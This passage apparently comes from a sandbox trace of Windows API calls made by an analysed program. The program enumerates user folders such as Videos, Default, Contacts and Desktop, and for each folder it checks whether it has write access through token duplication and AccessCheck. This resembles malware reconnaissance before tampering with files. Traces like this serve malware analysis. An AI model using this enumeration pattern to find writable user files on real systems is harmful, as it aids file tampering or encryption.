PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.347] CloseHandle (hObject=0x344) returned 1 [0106.347] CloseHandle (hObject=0x33c) returned 1 [0106.347] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.347] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.347] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.347] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.347] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.347] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.347] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.347] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.347] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.347] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.347] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.347] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.347] GetLastError () returned 0x7a [0106.347] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos", RequestedInformation=0x7, pSecurityDescriptor=0x28ab0a8, nLength=0xa4, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x28ab0a8, lpnLengthNeeded=0x281baf8) returned 1 [0106.348] GetLastError () returned 0x7a [0106.348] GetCurrentThread () returned 0xfffffffe [0106.348] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.348] GetCurrentProcess () returned 0xffffffff [0106.348] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.348] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.348] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.348] AccessCheck (in: pSecurityDescriptor=0x28ab0a8, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.348] CloseHandle (hObject=0x344) returned 1 [0106.348] CloseHandle (hObject=0x33c) returned 1 [0106.348] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.348] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.348] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.348] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.348] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.348] GetLastError () returned 0x7a [0106.348] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0", RequestedInformation=0x7, pSecurityDescriptor=0x28ab0a8, nLength=0x98, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28ab0a8, lpnLengthNeeded=0x281b560) returned 1 [0106.348] GetLastError () returned 0x7a [0106.348] GetCurrentThread () returned 0xfffffffe [0106.348] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.348] GetCurrentProcess () returned 0xffffffff [0106.348] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.348] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.348] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.348] AccessCheck (in: pSecurityDescriptor=0x28ab0a8, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.348] CloseHandle (hObject=0x32c) returned 1 [0106.348] CloseHandle (hObject=0x344) returned 1 [0106.348] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.348] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.349] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.349] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.349] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.349] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.349] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.349] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.349] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.349] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.349] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.349] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.349] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.349] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.349] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\7 hNkoOuqhuUPb4WBN\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.349] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\7 hNkoOuqhuUPb4WBN", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.349] GetLastError () returned 0x7a [0106.349] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\7 hNkoOuqhuUPb4WBN", RequestedInformation=0x7, pSecurityDescriptor=0x28ab0a8, nLength=0x98, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28ab0a8, lpnLengthNeeded=0x281b560) returned 1 [0106.349] GetLastError () returned 0x7a [0106.349] GetCurrentThread () returned 0xfffffffe [0106.349] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.349] GetCurrentProcess () returned 0xffffffff [0106.349] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.349] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.349] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.349] AccessCheck (in: pSecurityDescriptor=0x28ab0a8, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.349] CloseHandle (hObject=0x32c) returned 1 [0106.349] CloseHandle (hObject=0x344) returned 1 [0106.350] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.350] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.350] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.350] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.350] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.350] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.350] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.350] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.350] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.350] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\gq2odSlVTX32RO7-UPJ\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.350] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\gq2odSlVTX32RO7-UPJ", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.350] GetLastError () returned 0x7a [0106.350] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\gq2odSlVTX32RO7-UPJ", RequestedInformation=0x7, pSecurityDescriptor=0x28ab0a8, nLength=0x98, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28ab0a8, lpnLengthNeeded=0x281b560) returned 1 [0106.350] GetLastError () returned 0x7a [0106.350] GetCurrentThread () returned 0xfffffffe [0106.350] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.350] GetCurrentProcess () returned 0xffffffff [0106.350] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.350] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.350] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.350] AccessCheck (in: pSecurityDescriptor=0x28ab0a8, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.350] CloseHandle (hObject=0x32c) returned 1 [0106.350] CloseHandle (hObject=0x344) returned 1 [0106.350] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.350] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.350] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.350] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.351] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.351] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.351] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.351] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\h0HlIK4-OKRqwTJCKj\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.351] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\h0HlIK4-OKRqwTJCKj", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.351] GetLastError () returned 0x7a [0106.351] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\h0HlIK4-OKRqwTJCKj", RequestedInformation=0x7, pSecurityDescriptor=0x28ab0a8, nLength=0x98, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28ab0a8, lpnLengthNeeded=0x281b560) returned 1 [0106.351] GetLastError () returned 0x7a [0106.351] GetCurrentThread () returned 0xfffffffe [0106.351] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.351] GetCurrentProcess () returned 0xffffffff [0106.351] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.351] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.351] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.351] AccessCheck (in: pSecurityDescriptor=0x28ab0a8, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.351] CloseHandle (hObject=0x32c) returned 1 [0106.351] CloseHandle (hObject=0x344) returned 1 [0106.351] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.351] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.351] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.351] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.351] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.351] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.351] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.351] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.352] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\H1UVhZaX1OE 6HQDG\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.352] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\H1UVhZaX1OE 6HQDG", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.352] GetLastError () returned 0x7a [0106.352] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\H1UVhZaX1OE 6HQDG", RequestedInformation=0x7, pSecurityDescriptor=0x28ab0a8, nLength=0x98, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28ab0a8, lpnLengthNeeded=0x281b560) returned 1 [0106.352] GetLastError () returned 0x7a [0106.352] GetCurrentThread () returned 0xfffffffe [0106.352] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.352] GetCurrentProcess () returned 0xffffffff [0106.352] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.352] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.352] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.352] AccessCheck (in: pSecurityDescriptor=0x28ab0a8, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.352] CloseHandle (hObject=0x32c) returned 1 [0106.352] CloseHandle (hObject=0x344) returned 1 [0106.352] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.352] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.352] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.352] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.352] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.352] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.352] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.352] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.352] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.352] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.352] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.352] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.352] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.353] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 0 [0106.353] FindClose (in: hFindFile=0x5fc2d8 | out: hFindFile=0x5fc2d8) returned 1 [0106.353] FindNextFileW (in: hFindFile=0x5fc298, lpFindFileData=0x281c64c | out: lpFindFileData=0x281c64c) returned 1 [0106.353] FindNextFileW (in: hFindFile=0x5fc298, lpFindFileData=0x281c64c | out: lpFindFileData=0x281c64c) returned 1 [0106.353] FindFirstFileW (in: lpFileName="c:\\Users\\Default\\*", lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 0x5fc2d8 [0106.353] GetFileSecurityW (in: lpFileName="c:\\Users\\Default", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281c090 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281c090) returned 0 [0106.353] GetLastError () returned 0x7a [0106.353] GetFileSecurityW (in: lpFileName="c:\\Users\\Default", RequestedInformation=0x7, pSecurityDescriptor=0x28a44d0, nLength=0xc0, lpnLengthNeeded=0x281c090 | out: pSecurityDescriptor=0x28a44d0, lpnLengthNeeded=0x281c090) returned 1 [0106.353] GetLastError () returned 0x7a [0106.353] GetCurrentThread () returned 0xfffffffe [0106.353] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281c098 | out: TokenHandle=0x281c098*=0x0) returned 0 [0106.353] GetCurrentProcess () returned 0xffffffff [0106.353] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281c098 | out: TokenHandle=0x281c098*=0x334) returned 1 [0106.353] DuplicateToken (in: ExistingTokenHandle=0x334, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281c094 | out: DuplicateTokenHandle=0x281c094*=0x33c) returned 1 [0106.353] MapGenericMask (in: AccessMask=0x281c0a4, GenericMapping=0x281c074 | out: AccessMask=0x281c0a4) [0106.353] AccessCheck (in: pSecurityDescriptor=0x28a44d0, ClientToken=0x33c, DesiredAccess=0x120116, GenericMapping=0x281c074, PrivilegeSet=0x281c060, PrivilegeSetLength=0x281c084, GrantedAccess=0x281c088, AccessStatus=0x281c08c | out: PrivilegeSet=0x281c060, PrivilegeSetLength=0x281c084, GrantedAccess=0x281c088, AccessStatus=0x281c08c) returned 1 [0106.353] CloseHandle (hObject=0x33c) returned 1 [0106.353] CloseHandle (hObject=0x334) returned 1 [0106.353] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.353] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.353] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.353] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.353] FindFirstFileW (in: lpFileName="c:\\Users\\Default\\Contacts\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.354] GetFileSecurityW (in: lpFileName="c:\\Users\\Default\\Contacts", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.354] GetLastError () returned 0x7a [0106.354] GetFileSecurityW (in: lpFileName="c:\\Users\\Default\\Contacts", RequestedInformation=0x7, pSecurityDescriptor=0x28ab0a8, nLength=0xb8, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x28ab0a8, lpnLengthNeeded=0x281baf8) returned 1 [0106.354] GetLastError () returned 0x7a [0106.354] GetCurrentThread () returned 0xfffffffe [0106.354] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.354] GetCurrentProcess () returned 0xffffffff [0106.354] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.354] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.354] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.354] AccessCheck (in: pSecurityDescriptor=0x28ab0a8, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.354] CloseHandle (hObject=0x344) returned 1 [0106.354] CloseHandle (hObject=0x33c) returned 1 [0106.354] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.354] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.354] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.354] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.354] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.355] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.355] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.355] FindFirstFileW (in: lpFileName="c:\\Users\\Default\\Desktop\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.355] GetFileSecurityW (in: lpFileName="c:\\Users\\Default\\Desktop", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.355] GetLastError () returned 0x7a [0106.355] GetFileSecurityW (in: lpFileName="c:\\Users\\Default\\Desktop", RequestedInformation=0x7, pSecurityDescriptor=0x28a44d0, nLength=0xc0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x28a44d0, lpnLengthNeeded=0x281baf8) returned 1 [0106.355] GetLastError () returned 0x7a [0106.355] GetCurrentThread () returned 0xfffffffe [0106.355] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.355] GetCurrentProcess () returned 0xffffffff [0106.355] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.355] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.355] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.355] AccessCheck (in: pSecurityDescriptor=0x28a44d0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.355] CloseHandle (hObject=0x344) returned 1 [0106.355] CloseHandle (hObject=0x33c) returned 1 [0106.355] FindNextFileW (in: hFindFile=0x5fc318, 